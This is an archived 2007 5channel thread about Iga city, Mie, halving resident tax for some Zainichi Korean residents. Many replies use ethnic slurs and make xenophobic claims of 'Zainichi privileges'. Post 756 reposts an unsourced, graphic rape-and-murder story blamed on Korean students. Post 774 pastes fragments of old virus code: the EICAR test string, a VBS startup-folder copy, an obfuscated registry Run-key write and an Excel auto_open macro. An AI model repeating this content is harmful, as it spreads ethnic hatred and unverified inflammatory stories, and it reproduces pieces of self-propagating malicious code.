5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【在日】三重・伊賀市、「在日」の減免認める 市県民税を半額に〜他の自治体でも判明、総務省は「初耳」★4[11/13]

1 :力士 ◆RiKiCQzWKY @力士庶Oφ ★:2007/11/13(火) 20:16:10 ID:???
★伊賀市、昨年度までの「在日」の減免認める 市県民税を半額に

三重県伊賀市が数十年前から市内の一部の在日韓国人や在日朝鮮人を対象に市県民税を減額
していた措置について市は12日、「昨年度まで市県民税を半額にしていた」と認めた。同県内では
桑名市で本年度も同様の減免措置を講じていることが判明。四日市市に合併前の旧楠町でも
減免していたことが分かった。

伊賀市の減額措置は、昭和30年代から40年代にかけ、当時の上野市(現伊賀市)が、地元の
在日本大韓民国民団(民団)や在日本朝鮮人総連合会(朝鮮総連)との交渉を経て開始。市長が
特例で認めたという。当時は納付しない人も多く、半額でも徴収したい、と始めたらしい。

35年ほど前は算定額を低くしていたり減額率が細分化していたりと方式は一定ではなかったが、
最近10年は納付額を一律に半減。市は2004年11月の合併前まで市市税条例にある減免条件
「(市長が)特別な理由があると認める」場合に相当するとして慣例として単年度の市長決裁を
受けずに適用していた。

昨年度に半減措置を受けたのは市内の定住韓国・朝鮮人約400人のうち個人事業主を中心に
在日韓国人35人と在日朝鮮人18人。市が該当者分の納付書を民団と総連にまとめて送付。
それぞれの団体が取りまとめて納税していた。

他町村との合併協議の中で「減免措置があるのはおかしい」との指摘を受け、民団、総連と協議。
05年11月に翌06年度で全廃することで合意した。

民団三重県伊賀支部の申載三・支団長は「3年前に支団長になって措置を知った。参政権などを
求めるのに日本人と違うのは不公平だと改善に応じた」と話す。総連伊賀支部の金栄泰委員長は
「過去の経緯は話せない」と語った。

伊賀市は市民税と合わせて徴収する県民税も半額にしていたが、伊賀県税事務所は「減額は市
の裁量だが、半減措置は知らなかった」という。

県市町行財政室は「地方税上、条例の定めのない減免はできず、条例がないなら問題」、総務省
市町村税課は「減免は各市町村が判断し条例で定めるが、このような例は初耳」としている。

(中日新聞 2007年11月13日 朝刊)
http://www.chunichi.co.jp/article/national/news/CK2007111302063852.html

(関連スレ)
【国内】 伊賀市:「戦争補償」と住民税減免 在日韓国・朝鮮人の一部 昨年度末に廃止 /三重 [11/13]
http://news21.2ch.net/test/read.cgi/news4plus/1194943821/l50
【三重】伊賀・桑名市で法的根拠があいまいなまま在日市民の住民税減額する特例措置〜廃止・是正へ[11/13]
http://news21.2ch.net/test/read.cgi/news4plus/1194920425/l50
【在日】前市部長、1800万円着服か〜三重・伊賀市の詐取、「減額措置」を隠れみのに★3[11/11]
http://news21.2ch.net/test/read.cgi/news4plus/1194768991/l50

(前スレ)★1のたった日時:2007/11/13(火) 04:39:35
http://news21.2ch.net/test/read.cgi/news4plus/1194944571/

741 :ヽ(´∀`)ノハハハッ:2007/11/30(金) 00:13:06 ID:OX4fyukk
>>739
ええっ…与えてはいけないのか…www

>>735(li-ω´-)a゙...ャッパリ....カエシテ…

742 :USA☆G.I ◆USAGI.onzM :2007/11/30(金) 00:13:07 ID:EmjuHuSF
>>740
多分ウトロ。

743 :亜細亜の旭光:2007/11/30(金) 00:18:53 ID:oeAFgUwG
湯とろがなにかという質問だがわれわれ純粋真日本言語の語彙集には調べたが存在しないから不明であり推測で悪いが葛湯かある種の温泉のことではないか

744 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/11/30(金) 00:19:38 ID:2jXW6dB2
>>743
鶏頭なんだな…。

745 :亜細亜の旭光:2007/11/30(金) 00:22:35 ID:oeAFgUwG
鶏頭とはどのような意味か庭鳥の頭植物の一種どれでも意味が通らず分からない

746 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/11/30(金) 00:29:33 ID:KtT4sDI4
>>1 定住韓国・朝鮮人約400人のうち個人事業主を中心に

税金半額ならバカでも成功するよな

真面目に働いている日本人からは情け容赦なく取り立てて在日には半減かよ。


747 :朝鮮28号 ◆8PxOawJTkY :2007/11/30(金) 00:32:12 ID:dW1Q6MYX
>>746
ホームレスのおっさんたちが生活保護申請しても用紙を渡すことすら渋るくせに、在日や部落相手には惜しみなく金を出す。
ここはそういう国なんだよ。

真面目に生きるのがアホ臭くなってくるな。

748 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/11/30(金) 00:49:36 ID:y2Cq7xnL
地方のアホ制度という以前にコネクションで抜け道作っちゃってたって話でしょこれ。
在日かどうかすら関係なく、帰化してようが、ただ朝鮮民族勢力であればいくらでも特権的な
振る舞いが可能であることが明らかになったんであって、在日特権なんて呼び方ではおさまり
きらない重大な侵略性が示されてる。

749 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/11/30(金) 00:54:16 ID:nvHJZoNK
>>742
ちゃうちゃう。

湯とろ世代って書いてたから、ゆとりの間違いw

750 :ホロン部員 ◆t/GUd7ef.2 :2007/11/30(金) 04:44:21 ID:RD+hHo8C ?2BP(57)
なんか・・いらないホロン部員が全員集合か?
おいおまいら!正部員にチェンジ!

751 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/11/30(金) 07:03:12 ID:eDM12Z1e
Asou talkes about Takeshima's problem.
ttp://youtube.com/watch?v=QyvYQy_Utn0

752 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/11/30(金) 07:07:49 ID:+oSAiWlP
***本家ヨハネスブルグ    −   特定アジアのヨハネスブルグ“大阪民国”対置リスト(改2''')***
 <本家>                   <民国>
・カールトンセンター      =       通天閣
・ヨハネスブルグ中央駅周辺 =       難波駅〜新今宮駅周辺
・タクシーランク         =       天王寺周辺
・ヒルブロウ           =       OBP〜上町台地
 (ポンテ・シティ        =       世界貿易センタービル)
・ヨーヴィル           =       心斎橋〜道頓堀〜日本橋〜アメリカ村周辺
・ゴールドリーフ・シティ    =       USJ
・サントン地区          =       北摂地域
・ローズバンク地区      =       西宮周辺
・アレクサンドラ         =       尼崎・豊中南部周辺
・プレトリア            =       神戸
・ソウェト             =       西成・平野・生野・鶴橋・南海線沿線・阪和線沿線・南大阪線沿線・大和路線沿線・阪堺線沿線

(ムババネ/スワジランド   =       高槻・茨木)
(マセル/レソト         =       京都)
(ハボローネ/ボツワナ    =       奈良)
(マプート/モザンビーク   =       和歌山)
(トランスバール地方     =       播州地方)
(ブルームフォンテーン地方 =       滋賀)
(ウィントフック/ナミビア    =       伊賀/三重)

753 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/11/30(金) 22:03:14 ID:zKgN57ZF
常時age

754 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/01(土) 13:42:04 ID:sDZSUMVq
★★三重県人は関西人ですよねB★★
http://academy6.2ch.net/test/read.cgi/geo/1196074013/


755 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/01(土) 13:44:13 ID:I+uJOwzf
チョンの税金減免は違法っていう「最高裁」判決が出たな

756 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/01(土) 15:02:41 ID:84d5g94H
戦後日本で起きた最大の殺人事件ってなんだ?
http://blog.livedoor.jp/blog_ch/archives/50970324.html
1 :以下、名無しにかわりましてVIPがお送りします。 :2007/08/28(火) 08:06:28.34 ID:fIc0bTRp0
殺傷でも銃殺でも爆破でもなんでもいい

417 :以下、名無しにかわりましてVIPがお送りします。 :2007/08/28(火) 14:07:14.72 ID:Sa+tbdFZ0
532 :差別じゃなくて、今そこに居る危機だった朝鮮人:04/07/03 02:43 ID:LQU/7XZf
>>507
俺んちの田舎、在日朝鮮人学校があるんだわ。
で、そういうところって必ず朝鮮人部落ってのがあるんだよね。
朝鮮人なんかが犯罪犯してそこに逃げ込まれると、
警察も手出しが出来ないくらいの暗黒街なんだわ。
親から『あの近所には絶対近づくな。どうしてもあの近所に用があるときは、
包丁でもなんでもいいから、必ず武器を持っていけ。』
って言われたくらいだからね。俺が小学校高学年の時かな。

下校途中の中学生の女の子が、在日朝鮮人学校の生徒にレイプされる事件があったんだよ。
たまたま一緒にいたクラスメートの男子が助けに入ったんだけど、
彼はバットか何かで頭を殴られてしまったんだ。
女の子の方は、部落に引きずり込まれてさんざん嬲られた挙句、
あそこに電球つっこまれて、それが中で割れちゃっててひどい事になっていたらしい。
結局、頭を割られて血まみれになったクラスメートの男子と一緒に、ほとんど全裸で通りに放り
出されていたのを通行人に助けられたんだ。頭を割られた男の子は、頭蓋骨陥没骨折と脳挫傷で
3日後に死亡、女の子もレイプされたショックから立ち直れず、
半年くらい後に、『お母さん、ごめんなさい。』って遺書を書いて自殺しちゃったよ。

418 :以下、名無しにかわりましてVIPがお送りします。 :2007/08/28(火) 14:07:33.58 ID:Sa+tbdFZ0
(ツヅキ)

俺はその時、子供ながら『何で、あの女の子が
“お母さん、ごめんなさい”なんて書いて自殺しなきゃなんないんだ。?
悪いのはみんな在日朝鮮人だろう。!!』って、
物凄い怒りを覚えたよ。警察も動いたけど、結局、部落には踏み込めなかったよ。
最後に警察が掴んだ情報は、
『犯人は総連にその日のうちに保護されたもよう、2〜3日後に
総連の保護のもと、北に逃げたと思われる。』という情報だけだったそうだ。

女の子が自殺して二年くらい経った時かな。?被害者の遺族あてに差出人不明のいやがらせの
手紙が届いたんだ。内容は『お前達の息子を殺し娘を犯した者達はわが祖国で労働英雄となった。
いい気味だな日本人。』という内容だったそうだ。
結局、被害にあった家族はみんな町を捨ててどこかに引っ越していった。
(例の日本人小学生を斧で殴った朝鮮人も無罪になりました。)

757 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/01(土) 15:14:33 ID:8sMEK2bV
北朝鮮の事もそうだったけど
在日韓国人でもこうゆうの知らない人多いんじゃない?
チョンはチョンに裏切られる
文化、スポーツ、歴史、戦争いつもそう

758 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/01(土) 15:15:43 ID:wcf2mZXp
【小平市】「無年金福祉給付金」【在日特権】
http://tmp6.2ch.net/test/read.cgi/asia/1195565917/

2007年11月27日(火)  12月議会初日

[本日全会一致で可決した議案]

・請願第5号 過去の国籍要件が理由で老齢福祉年金のない高齢者及び
 障害基礎年金のない重度障害者に対する緊急救済措置として特別給
 付金の早期実施を求めることについて

・議員提出議案第17号 在日無年金高齢者及び障害者に対する救済措置
 を求める意見書提出について

http://tsunematsu.blog8.fc2.com/blog-entry-1095.html

759 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/01(土) 23:37:14 ID:y693phSu
age

760 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/02(日) 01:03:08 ID:hpXRxieS
在日半額!
日本人倍額!

761 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/02(日) 09:55:54 ID:JdUuVQzL
テレビでは、ほとんど言わんな。



・・・・・・このニュース

762 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/02(日) 11:29:41 ID:y6kZe1kI
伊賀市コリアン協議会発足
http://www.searchnavi.com/~hp/mindanmie/news/060219.htm

今岡睦之 伊賀市長
http://www.searchnavi.com/~hp/mindanmie/news/060219.files/image011.jpg
田中 覚 三重県議会議長
http://www.searchnavi.com/~hp/mindanmie/news/060219.files/image014.jpg
喜び組w
http://www.searchnavi.com/~hp/mindanmie/news/060219.files/image015.jpg
伊賀市や伊賀市議会から花
http://www.searchnavi.com/~hp/mindanmie/news/060219.files/image025.jpg
http://www.searchnavi.com/~hp/mindanmie/news/060219.files/image027.jpg

伊賀市交際費(H17年度)
http://www.city.iga.lg.jp/kbn/01022/01022.html
2月19日 お祝生花 伊賀コリアン協議会発足記念祝賀会へ 10,500

三重・伊賀 コリアン会館新改築竣工式 行政との交渉の窓口に [朝鮮新報 2005.6.21]
http://www1.korea-np.co.jp/sinboj/j-2005/01/0501j0621-00001.htm

【在日】民団と総連が初の共同組織 「伊賀コリアン協議会」発足[02/19]
http://news18.2ch.net/test/read.cgi/news4plus/1140336036/


763 :<丶`∀´>(´・ω・`)(`ハ´  )さん :2007/12/03(月) 07:38:52 ID:ii68h41F
きた〜!今日発売の週刊ポストのトップ記事!
いよいよタブーが明らかにされる

764 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/03(月) 07:47:37 ID:z/8gwybc
【国内】「反日デモは日本の責任」と書いたピースボートを電話で小一時間問い詰める[04/22]
http://news18.2ch.net/test/read.cgi/news4plus/1114221881/

野 ピースボートの野平と申します
mu わざわざありがとうございます。デモに関する記事についてなんですが
野 ハイ
mu 「人を殴っておいて、その殴られた人が怒ったとき、もっと冷静になろうよと殴った側が言うのはおかしいと思いませんか?」との一文があります。これは、暴力を容認されるということでしょうか。
野 そういうことではございません。暴力を容認することはできません。但し、その原因についても考えるべきではないか、ということです。
mu そうですか。ここで、http://www.jlp.net/news/021015c.htmlの記事を読みますと、「在日朝鮮人への嫌がらせを許すな」と主張されています。これは、ダブルスタンダードじゃないんですか。
野 違いますね
mu 何故ですか
野 違うと思いますよ
mu だから、何故ですか。この場合だったら、朝鮮総連に対し「嫌がらせが起きた原因を考えてみるべき」というべきだと思いますが。
野 それは違います。今回の中国のデモというのは、あまりにも日本の報道が「中国が悪い」という点に偏っているので、彼らのデモの原因についても探ってみるべきだと主張しているのです。
mu 原因が何であれ、暴力行為は許されないでしょ。
野 私たちもそう思いますよ。
mu ならば、それを主張するべきです。
野 いや、ですから今回はマスメディアの報道が偏っているから、私たちは声を上げたわけです。
mu まとめると、「日本人が加害者の時は日本人が悪い。日本人が被害者のときも日本人が悪い」ということですね。
野 違います。
mu そういうことでしょ。
野 いいえ、違います。
mu 違わないですよ。ダブルスタンダードですよ。「何が何でも日本人が悪い」という点では一貫してますけど。
野 ダブルスタンダートとは思わないですね。
mu それならば、「在日朝鮮人への嫌がらせ」に対して、ピースボートは「朝鮮総連は原因をよく考えろ」と言うべきです。
野 そう思わないですね
mu そう思わないのはピースボートだけです。ネット上では、今、大騒ぎですよ。
野 それは、日本全体が右傾化してきてですね・・・・

765 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/03(月) 07:55:27 ID:xS+wu/VK
あるぇ〜?
自称市民の味方共産党さん、なんで動かないの〜?

766 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/03(月) 10:46:39 ID:JTS8BAJr
キタ━━━━━━(゚∀゚)━━━━━━━!!!!!

週刊ポスト(2007/12/14)/頁:24

在日「住民税<極秘>半減」の密約を撃つ!−誰も知らなかった最大のタブー
三重県伊賀市・市役所幹部詐欺事件、住民税半減措置

http://www.zasshi.com/zasshiheadline/syuukanpost.html

キタ━━━━━━(゚∀゚)━━━━━━━!!!!!

767 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/03(月) 12:44:56 ID:SlwMmiGx
>>747 >>746 >>724

・「敗戦から半世紀が経過したのに、修正した日本軍が完全再建されない日本」
・「スパイ防止法がない日本」
・「日本政府による在日南北朝鮮人への特権付与」
・「不法移民が巨大な豪邸を連ね、先住民の日本人が掘っ立て小屋に監禁される異様な国」

これら日本の悪弊についての資料を見ていてハタと思った

何を隠そう、この日本こそ実は、

アクションアニメ「ブラックラグーン」の主要舞台である
悪党の国連総本部・ロアナプラじゃないか!
悪党に分割支配されたロアナプラは、
実はあまりに無様なこの日本を分かりやすく描いた街だったのだ。

ロアナプラの設定----

「ロアナプラは、東南アジア某国にある穏やかな小さな港町だった。」
「が、冷戦構造やらベトナム戦争なにやらで主要各国の諜報機関、多国籍犯罪組織が流入」
「ついには行政や司法、立法を乗っ取られ、魔都というか<悪党の国連本部>となった」





768 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/03(月) 14:38:50 ID:yeIUmUQ0
ポストうpしてくれ!!

769 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/03(月) 14:51:28 ID:0i2s+inv
>>767
現実逃避してないで真実をしれ。
ttp://3.csx.jp/peachy/data/korea/korea.html

770 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/03(月) 15:10:34 ID:KPLHZG6Y
週刊ポストの記事でスレ盾してくれ。

771 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/03(月) 17:01:05 ID:GPl7Tc+a
韓国人が起こしている問題

●対馬侵略の件、貼っておきますね。

●【対馬】韓国人の固定資産税未払い問題
2006年04月27日 (木) 00:30 | 編集
現在、長崎県対馬市では、特区申請により 外国人でも住民登録を済ませれば
土地の購入ができるようになっている。しかし、その事実が予想外の大きな問題を引き起こしているようだ。
長崎県対馬市は、日本海の西に浮かぶ南北約82km、東西18kmの細長い島で、北は対馬海峡西水道をはさんで
朝鮮半島に面し、南は対馬海峡東水道をはさんで 壱岐島、九州本土に面している。
対馬から福岡まで海路は138kmだが、対馬から韓国の釜山までのその半分以下
距離は49.5kmという立地条件と特区指定による
ビザ免除で訪問が可能という事もあって、大量の韓国人観光客が訪れている。しかし、今、この
韓国人たちが引き起こす問題がクローズアップされてきた。
長崎県対馬市では、住民登録を済ませれば、韓国人でも土地取得が可能ということもあって、
韓国人投資家や別荘地を求める韓国人が、相次いで土地を購入している。しかし、これらの
不動産購入者のほとんどが、日本に固定資産税や住民税を納めることを拒否しているというのだ。
韓国には『対馬は元来、 韓国の領土』という意見が根強く
『韓国領土の不動産を取得したのに 日本へ税金を納めるのはおかしい』というのが
税金不払いの主な理由らしい

772 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/03(月) 17:25:42 ID:08zJPa/3
在日半額=邦人倍額

マックかよ?

773 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/03(月) 17:40:30 ID:4w/4S+hV
パンドラの箱が開いたと聞いて飛んで来ますたwww

774 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/03(月) 17:47:59 ID:o/ptozsB
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub
܃ܷܵܶޫޭॢ
kak\.hta\';\ken=\wd+'\START

775 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/03(月) 23:00:03 ID:YEZIwj5C
  ↑

都合が悪くなるとウィルス張る奴がいるな
おれの蚊スペルだから意味無いけど

776 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/03(月) 23:06:38 ID:JTS8BAJr
全国民必読 キタ━━━━━━(゚∀゚)━━━━━━━!!!!!

『週刊ポスト』12月14日号
http://www.weeklypost.com/071214jp/index.html

<全国民必読リポート>
誰も知らなかった「最大タブー」が発覚
在日韓国人・朝鮮人「住民税 極秘半減」の免税密約を撃つ!
三重県伊賀市幹部の詐欺事件で分かった、
民団・総連と行政との「闇」を全国自治体で追う

市民に知らせることなく、法にも定めず、極秘裏に
行なわれてきた三重県伊賀市ほかの在日韓国・朝鮮
人に対する《住民税半減措置》。行政が作り出した
闇は、市幹部が私腹を肥やす「装置」として利用さ
れていた。時を同じくして、永田町で、在日韓国・
朝鮮人をはじめとする永住外国人への参政権付与を
巡る論議が再び活発化している中、民団・総連と行
政との不可解な関係は「清算」を迫られている。

全国民必読 キタ━━━━━━(゚∀゚)━━━━━━━!!!!!

777 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/04(火) 07:55:17 ID:ojFdgWSB
>>776
記事に取り上げたのはGJ!なんだけど、最後まで読むと
巧妙に参政権に絡ませているので注意が必要。

納税と参政権は全く別であることをきちんと知らしめるべ
きだ。


778 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/04(火) 08:02:46 ID:ojFdgWSB
>>777
以下、週刊ポストからの引用

 伊賀、桑名市両市の措置の法的根拠になっていたのは、脆性優遇の条件を定める
条例中にある「特別の事情があり、市長が認める場合」と言う文言だった。
 ところが、総務省の鹸化は異なる。
「税金の負担額は、条例に基づいて各自治体が判断するべきものですが、外国籍を
理由に税負担を軽くすることは、税の公平性という観点から見て問題がある」(自
治行政局市町村課)

引用終わり。

市長が税負担を認めた理由書があるはずでそれにどう書かれているか知りたいね。
とかいうとすぐに書き換えるんだろうけど。



779 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/04(火) 08:08:42 ID:ojFdgWSB
伊賀市役所に問い合わせたところ、以下のような回答がきた。

時間がないので、本文のみ載せておきます。
皆さんで検証してください。

それにしてもすごい比率ですねwww
-----------------------------------------------------------------
三重県伊賀市の広聴広報課です。

「民団・総連」に所属する一部会員に対して、市民税の減免措置を行うに至った経過については、
伊賀市のホームページに掲載した『市民税減免措置についての説明』のとおりです。
ご質問の「特別の理由により」減免措置を受けた対象者数については、昨年度は市内の定住韓国・
朝鮮人約400人のうち個人事業主を中心に「民団」に加入している在日韓国人納税者35人と、
「総連」に加入している在日朝鮮人納税者18人の53人です。
また、「民団・総連」加入者以外の市税条例第51条第1項第5号の適用者は、個人ではここ数年
間は申請は出されていませんが、過去においては災害等を理由に概ね毎年2人程度が減免措置の
適用を受けており、また、法人にかかる減免は116件でした。
減免措置につきましては、納税者の方で市長が必要であると認めるものについては、今後も減免
ができることになっていますので、ご理解いただきますようお願いいたします。

780 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/04(火) 08:11:02 ID:mE84owlj
つまり在日朝鮮人については今後も市長が誰にも知られずに減免できると

781 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/04(火) 09:41:25 ID:XsRfEiJ5
>>779
特定団体に加入している事が合理的な要件になるのか?
”法人にかかる減免は116件”法人住民税でもやってたのか。
三重県には来年の交付金無しで良いよ。

782 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/04(火) 10:21:27 ID:z1i3c9WY
>>771
洒落にならねぇ
これもっと日本人が知ったらマジで切れるぞ

783 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/04(火) 10:32:15 ID:o9BoBR11
だから在日特権は実在すると散々言ってたのに
チョン工作員のそんなのねえよコールに惑わせれやがってこの馬鹿共が

784 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/04(火) 12:17:53 ID:F0S8LgNY
>法人にかかる減免は116件でした。

さらに疑惑が出てきたね。
これの減免措置適用の理由の内訳は?

785 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/04(火) 23:02:56 ID:WIXX3F/e
日本優勝記念あげ

786 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/04(火) 23:07:34 ID:WIZOZr92
>>784
これが所謂5か条のご誓文とやらですかね

5か条のご誓文で法人税減免

市長のさじ加減で住民税減免


半島人商人の店が裕福なわけだ。

787 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/04(火) 23:12:50 ID:AbBKmzaZ

★大虐殺の嘘を許さない!★  集会のお知らせ

     「参戦勇士の語る『南京事件』の真実」

 ○日時  12月6日(木曜日) 午後六時(五時半開場)
 ○場所  九段会館大ホール
 ○会場分担金  1000円
 ○プログラム 映画「南京の真実」予告編。およびスライド上映。
        序論解説と概論  加瀬英明
        司会と解説    冨澤繁信、藤岡信勝
        本論(それぞれ、その現場にいた生存兵士の証言)
 ○主催 「南京事件の真実を検証する会」
      (加瀬英明会長、藤岡信勝事務局長、杉原誠四郎、
       東中野修道、宮崎正弘、花岡信昭、西村幸祐ほか)

このイベントはおそらく生存者としても最後に機会になるでしょう。
歴史への真実の証言をわれわれは聞いておく必要があります。
中国における反日記念館の不当な展示撤去等々を求める国民運動を、日本外交のトップに据えるキャンペーンが切って落とされる記念す
べき催しとなるでしょう。


788 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/04(火) 23:19:49 ID:qnSlOV3j
応援頼む

新聞すら取れないド田舎香川貧民のチョンが
自分でググれないのでファビョって食中毒のソース出せって暴れてます
事実が事実である事を教えて追っ払ってやってください
http://life9.2ch.net/test/read.cgi/countrylife/1189831356/181-


789 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/05(水) 06:24:12 ID:ADJE4yc1
さらしage

>法人にかかる減免は116件

まだまだ出てきそうだよ〜!

790 :<丶`∀´>(´・ω・`)(`ハ´  )さん:2007/12/05(水) 15:33:04 ID:9eWE1b5t
一、愛国者として〜いつも心に「公」を〜
 検証!「在日『住民税半減』の免税密約を撃つ!」
http://blog.goo.ne.jp/odin_1974/e/4aad657d22a28adbeb9f39cbac3fdb09

272 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)